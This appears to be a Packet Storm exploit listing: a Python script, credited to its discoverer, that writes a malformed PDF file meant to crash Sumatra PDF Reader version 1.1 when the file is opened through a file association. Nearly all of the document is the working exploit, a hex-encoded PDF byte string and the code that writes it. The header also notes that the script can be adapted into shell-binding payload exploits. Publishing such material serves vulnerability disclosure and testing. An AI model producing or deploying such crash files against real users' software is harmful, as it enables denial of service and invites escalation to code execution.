Sumatra PDF Reader version 1.1 denial of service exploit that creates a malicious .pdf file.
c44ea0b92225e6341cf08efb459f66ecb0dacf1b55b5476959f908d23e3c8e2e###########################################################################
###########################################################################
######## SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator ########
###########################################################################
# Vulnerability Detection Time : 21st June 2010, 1:13 AM #
# Tested on version 1.1 of Sumara PDF Reader #
# Nature : Accidental Discovery #
###########################################################################
# Description : Sumatra PDF Reader crashed while testing recovered PDF #
# Files from a HardDisk. PDF Files recovered using Forensic #
# Tools were large in size. DoS code has been optimised to #
# implement the crash with reduced file-size. #
# Notes : This source can be modified after analyzing the crash appcompat #
# files to write shell bind / other payloaded exploits. #
# Sumatra PDR Reader crashed when PDF Files were already #
# associated to launch it.
# #
# Thanks to Felicity. Hope you got your files back :-) #
###########################################################################
# Vulnerability Discoverer : Azim Poonawala [ QUAKERDOOMER ] #
# Email : quakerdoomer [ @ ] fmguy.com #
###########################################################################
###########################################################################
#!/usr/bin/python
# Usage: python sumatra_pdf_v1.1_DoS_file.py
data = (
"\x25\x50\x44\x46\x2D\x31\x2E\x34\x0D\x25\xE2\xE3\xCF\xD3\x0D\x0A" +
"\x36\x20\x30\x20\x6F\x62\x6A\x3C\x3C\x2F\x48\x5B\x36\x37\x36\x20" +
"\x31\x35\x37\x5D\x2F\x4C\x69\x6E\x65\x61\x72\x69\x7A\x65\x64\x20" +
"\x31\x2F\x45\x20\x31\x34\x38\x30\x32\x2F\x4C\x20\x31\x38\x37\x31" +
"\x39\x2F\x4E\x20\x31\x2F\x4F\x20\x39\x2F\x54\x20\x31\x38\x35\x35" +
"\x33\x3E\x3E\x0D\x65\x6E\x64\x6F\x62\x6A\x0D\x20\x20\x20\x20\x20" +
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" +
"\x20\x20\x0D\x0A\x78\x72\x65\x66\x0D\x0A\x36\x20\x31\x39\x0D\x0A" +
"\x30\x30\x30\x30\x30\x30\x30\x30\x31\x36\x20\x30\x30\x30\x30\x30" +
"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x38\x33\x33\x20\x30" +
"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x36" +
"\x37\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30" +
"\x30\x30\x30\x39\x30\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A" +
"\x30\x30\x30\x30\x30\x30\x31\x30\x33\x38\x20\x30\x30\x30\x30\x30" +
"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x32\x32\x39\x20\x30" +
"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x36" +
"\x38\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30" +
"\x30\x30\x32\x30\x39\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A" +
"\x30\x30\x30\x30\x30\x30\x32\x31\x32\x34\x20\x30\x30\x30\x30\x30" +
"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x31\x36\x38\x20\x30" +
"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x33\x39" +
"\x34\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30" +
"\x30\x30\x34\x33\x33\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A" +
"\x30\x30\x30\x30\x30\x30\x36\x39\x39\x39\x20\x30\x30\x30\x30\x30" +
"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x37\x37\x35\x39\x20\x30" +
"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x37\x39" +
"\x39\x38\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30" +
"\x30\x30\x38\x32\x34\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A" +
"\x30\x30\x30\x30\x30\x30\x38\x34\x39\x38\x20\x30\x30\x30\x30\x30" +
"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x31\x31\x34\x30\x32\x20\x30" +
"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x31\x34\x37" +
"\x32\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x74\x72\x61\x69" +
"\x6C\x65\x72\x0D\x0A\x3C\x3C\x2F\x53\x69\x7A\x65\x20\x32\x35\x2F" +
"\x50\x72\x65\x76\x20\x31\x38\x35\x34\x33\x2F\x52\x6F\x6F\x74\x20" +
"\x37\x20\x30\x20\x52\x2F\x49\x6E\x66\x6F\x20\x35\x20\x30\x20\x52" +
"\x2F\x49\x44\x5B\x3C\x33\x64\x32\x38\x34\x30\x64\x30\x39\x37\x36" +
"\x61\x37\x66\x32\x61\x37\x30\x34\x31\x37\x32\x36\x65\x37\x30\x38" +
"\x33\x38\x31\x62\x30\x3E\x3C\x65\x39\x35\x37\x38\x32\x63\x37\x34" +
"\x36\x62\x38\x34\x39\x34\x64\x39\x62\x39\x37\x31\x33\x30\x38\x37" +
"\x31\x38\x33\x36\x62\x34\x39\x3E\x5D\x3E\x3E\x0D\x0A\x73\x74\x61" +
"\x72\x74\x78\x72\x65\x66\x0D\x0A\x30\x0D\x0A\x25\x25\x45\x4F\x46" +
"\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" +
"\x20\x20\x0D\x0A\x38\x20\x30\x20\x6F\x62\x6A\x3C\x3C\x2F\x4C\x65" +
"\x6E\x67\x74\x68\x20\x38\x30\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46" +
"\x6C\x61\x74\x65\x44\x65\x63\x6F\x64\x65\x2F\x4C\x20\x39\x30\x2F" +
"\x53\x20\x34\x30\x3E\x3E\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\xDA" +
"\x62\x60\x60\x10\x60\x60\x60\xFA\xC0\x20\x04\x66\xAE\x0C\xA8\x80" +
"\x19\x88\x59\x18\x38\x16\x80\xD5\xC0\x81\x20\x03\x8C\xAF\xC4\xC0" +
"\xC3\xFA\x61\xAE\x54\x61\x11\x03\x03\x57\xCE\xC2\x94\x25\x9B\xAE" +
"\xF1\x5C\xB8\xCC\x7B\xDB\xEC\xEC\x02\x2D\xB0\x3C\x23\x03\x83\xA5" +
"\x29\x90\x66\x02\x62\x0B\x80\x20\x03\x20\x10\xE9\x0D\xCE\x0D\x0A" +
"\x65\x6E\x64\x73\x74\x72\x65\x61\x6D\x0D\x65\x6E\x64\x6F\x62\x6A" +
"\x0D\x37\x20\x30\x20\x6F\x62\x6A\x3C\x3C\x2F\x50\x61\x67\x65\x73" +
"\x20\x33\x20\x30\x20\x52\x2F\x54\x79\x70\x65\x2F\x43\x61\x74\x61" +
"\x6C\x6F\x67\x2F\x50\x61\x67\x65\x4C\x61\x62\x65\x6C\x73\x20\x31" +
"\x20\x30\x20\x52\x2F\x4D\x65\x74\x61\x64\x61\x74\x61\x20\x34\x20" +
"\x30\x20\x52\x3E\x3E\x0D\x65\x6E\x64\x6F\x62\x6A"
);
try:
f1 = open("SumatraPDF_Reader_1.1_crasher_DoS.pdf","w")
f1.write(data)
f1.close()
print("\nPDF file created ! : [SumatraPDF_Reader_1.1_crasher_DoS.pdf]\nLaunch it to run under Sumatra PDF Reader v1.1 to test crash.\n\nNOTE : Launching Sumatra PDF Reader and then using File/Open Ctrl+O to open\nthis file WON'T cause a DoS\n")
print("Written by : Azim Poonawala (QUAKERDOOMER) [ quakerdoomer [ @ ] fmguy.com ]\n\t\thttp:/solidmecca.co.nr\n\t\thttp://winautopwn.co.nr\n\t\thttp://my.opera.com/quakerdoomer");
except:
print "Error"
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed